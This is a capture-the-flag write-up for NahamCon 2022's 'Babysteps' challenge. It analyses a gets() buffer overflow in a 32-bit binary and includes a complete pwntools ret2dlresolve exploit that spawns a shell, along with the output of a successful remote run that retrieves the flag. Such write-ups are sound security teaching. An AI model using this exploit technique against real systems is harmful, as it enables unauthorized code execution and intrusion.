Tags: bof pwn ret2dlresolve 

Rating:

NahamCon CTF 2022

Babysteps

Become a baby! Take your first steps and jump around with BABY SIMULATOR 9000!

Author: @JohnHammond#6971

babysteps babysteps.c

Tags: pwn x86 bof remote-shell ret2dlresolve

Summary

Embryo pwn featuring gets.

From man gets:

BUGS

Never use gets(). Because it is impossible to tell without knowing the data
in advance how many characters gets() will read, and because gets() will
continue to store characters past the end of the buffer, it is extremely
dangerous to use. It has been used to break computer security. Use fgets()
instead.

Analysis

Checksec

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

No mitigations, basically choose your own adventure.

I went with ret2dlresolve because I'm lazy and the code is identical for most gets challenges.

Ghidra Decompile

void ask_baby_name(void)
{
  char local_1c [20];
  
  puts("First, what is your baby name?");
  gets(local_1c);
  return;
}

gets is the vulnerability and given no constraints there are numerous ways to solve this.

local_1c is 0x1c bytes from the base of the stack frame (right above the return address main will return to on return). To exploit just write out 0x1c bytes of garbage followed by your exploit.

Exploit

#!/usr/bin/env python3

from pwn import *

binary = context.binary = ELF('./babysteps', checksec=False)

rop = ROP(binary)
dl = Ret2dlresolvePayload(binary, symbol='system', args=['sh'])

rop.gets(dl.data_addr)
rop.ret2dlresolve(dl)

if args.REMOTE:
    p = remote('challenge.nahamcon.com', 31127)
else:
    p = process(binary.path)

payload  = b''
payload += 0x1c * b'A'
payload += rop.chain()
payload += b'\n'
payload += dl.payload

p.sendlineafter(b'name?\n',payload)
p.interactive()

Google ret2dlresolve or read some of my other write ups for details.

Output:

# ./exploit.py REMOTE=1
[*] Loaded 10 cached gadgets for './babysteps'
[+] Opening connection to challenge.nahamcon.com on port 31127: Done
[*] Switching to interactive mode
$ cat flag.txt
flag{7d4ce4594f7511f8d7d6d0b1edd1a162}
Original writeup (https://github.com/datajerk/ctf-write-ups/tree/master/nahamconctf2022/babysteps).